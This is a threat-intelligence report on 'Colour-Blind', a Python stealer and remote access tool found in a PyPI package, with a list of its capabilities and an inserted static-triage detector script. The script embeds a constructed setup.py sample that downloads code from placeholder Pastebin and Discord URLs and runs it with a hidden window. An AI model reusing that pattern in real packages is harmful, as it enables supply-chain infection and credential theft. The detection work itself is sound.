- Kroll has detected a fully featured information stealer and remote access tool in the Python Package Index.
- The malware was found as part of a recent project to obtain more awareness of initial attack vectors.
- Kroll recommends using deployment processes that sandbox build targets before they are pushed to production.
Kroll’s Cyber Threat Intelligence team has discovered multiple malicious packages with different degrees of sophistication. The team has also developed a tool to monitor the Python Package Index (PyPI) and obtain malicious packages as they are added to it. Kroll named the malware it uncovered Colour-Blind: a fully featured information stealer and remote access tool written in Python.
Using a tool by Kroll
The malicious package was found as part of a project that aims to increase awareness of initial attack vectors, using a tool developed by Kroll’s threat intelligence team. Kroll’s tool detected a package named “colourfool”, and a copy was archived for manual inspection shortly after it was uploaded to PyPI. The first inspection revealed that it contained only one Python file of note: a suspiciously large setup.py file that had last been modified four days earlier.
The setup.py script downloads a file and executes it while hiding the process from the user, an obvious sign that the package is suspicious and likely malicious. It obtains the download URL from a Pastebin snippet and, failing that, falls back to a hardcoded Discord content delivery network URL. Legitimate libraries use hardcoded URLs for downloading executable resources.
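The install-time traits described above (a large setup.py that fetches a URL from a paste site with a CDN fallback, then runs the download with its window hidden) can be triaged statically before a build is allowed to proceed. The following is an added example, not Kroll’s monitoring tool; the call-name lists, URL patterns and size threshold are assumptions, and the sample setup.py is constructed with placeholder URLs.

```python
"""Static triage of a setup.py for install-time download-and-execute behaviour."""
import ast
import re

# Constructed heuristics (assumptions, not a complete rule set).
NETWORK_CALLS = {"urlopen", "urlretrieve", "get", "post", "request"}
EXEC_CALLS = {"Popen", "call", "run", "system", "startfile", "exec", "eval"}
SUSPICIOUS_URL = re.compile(r"https?://(pastebin\.com|cdn\.discordapp\.com)/", re.I)
HIDE_ARGS = {"creationflags", "startupinfo"}  # Windows window-hiding keyword args


def triage_setup_py(source: str, size_threshold: int = 20_000) -> list[str]:
    """Return human-readable findings for the given setup.py source text."""
    findings = []
    if len(source) > size_threshold:
        findings.append(f"large setup.py ({len(source)} bytes)")
    for node in ast.walk(ast.parse(source)):
        # Hardcoded paste-site / CDN URLs anywhere in the file.
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            if SUSPICIOUS_URL.search(node.value):
                findings.append(f"hardcoded paste/CDN URL: {node.value}")
        # Calls that fetch content or execute something at install time.
        if isinstance(node, ast.Call):
            func = node.func
            name = func.attr if isinstance(func, ast.Attribute) else getattr(func, "id", "")
            if name in NETWORK_CALLS:
                findings.append(f"network call at install time: {name}()")
            if name in EXEC_CALLS:
                hidden = any(kw.arg in HIDE_ARGS for kw in node.keywords)
                suffix = " with hidden window" if hidden else ""
                findings.append(f"process/code execution: {name}(){suffix}")
    return findings


# Constructed sample mimicking the described pattern; URLs are placeholders.
SAMPLE = '''
import subprocess, urllib.request
from setuptools import setup
def fetch():
    try:
        return urllib.request.urlopen("https://pastebin.com/raw/PLACEHOLDER").read().decode()
    except Exception:
        return "https://cdn.discordapp.com/attachments/PLACEHOLDER/code.py"
urllib.request.urlretrieve(fetch(), "code.py")
subprocess.Popen(["python", "code.py"], creationflags=0x08000000)
setup(name="example", version="0.1")
'''

if __name__ == "__main__":
    for finding in triage_setup_py(SAMPLE):
        print("[!]", finding)
```

Run it against each package’s setup.py in a sandboxed build stage and fail the build on any finding, rather than letting pip execute the file on a production host.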
The second stage is a file named code.py, which is significantly larger at 300 kilobytes and 2,038 lines of code. It includes a larger imports section along with modules that enable malicious activity such as keylogging and cookie theft. Some of the functions are blatantly malicious, for example a function named disable_antivirus; others try to add the malware’s location to the Microsoft Defender Antivirus exclusion path in Windows. Kroll’s Cyber Threat Intelligence team said:
“From analysis of the Colour-Blind malware, it is evident that this RAT has a lot of interesting features. It shows us how the common functionality of malware can easily be written in modern languages such as Python. This malware also provides insights into how the democratization of cybercrime could lead to an intensified threat landscape, as multiple variants can be spawned from code sourced from others. As such, Kroll will continue to monitor open-source language repositories for further malware strains to enable further detection opportunities.”
The functionality of the RAT accessible from the control interface includes:
- Tokens: Dumps to the screen login tokens for several applications that use Chromium, either via electron.io or directly, as an application framework, a notable example being Discord.
- Passwords: Dumps passwords extracted from web browsers to screen
- Cookies: Dumps all browser cookies to screen
- Keys: Dumps the keylogger’s captured data to screen
- Applications: Provides a list of running applications and a button to terminate them
- Data Dump: Sends all captured data to the C2 URL
- Screen: Shows a screenshot of the user’s desktop and allows rudimentary interaction such as key presses
- IP: Looks up IP information and displays it to screen (using a different function from the one used earlier)
- Open Browser: Opens a browser to a given webpage
- Run: Runs a command via the operating system
- Text Input: Sends keystrokes to the machine
- Phantom/Metamask: Steals cryptocurrency wallet information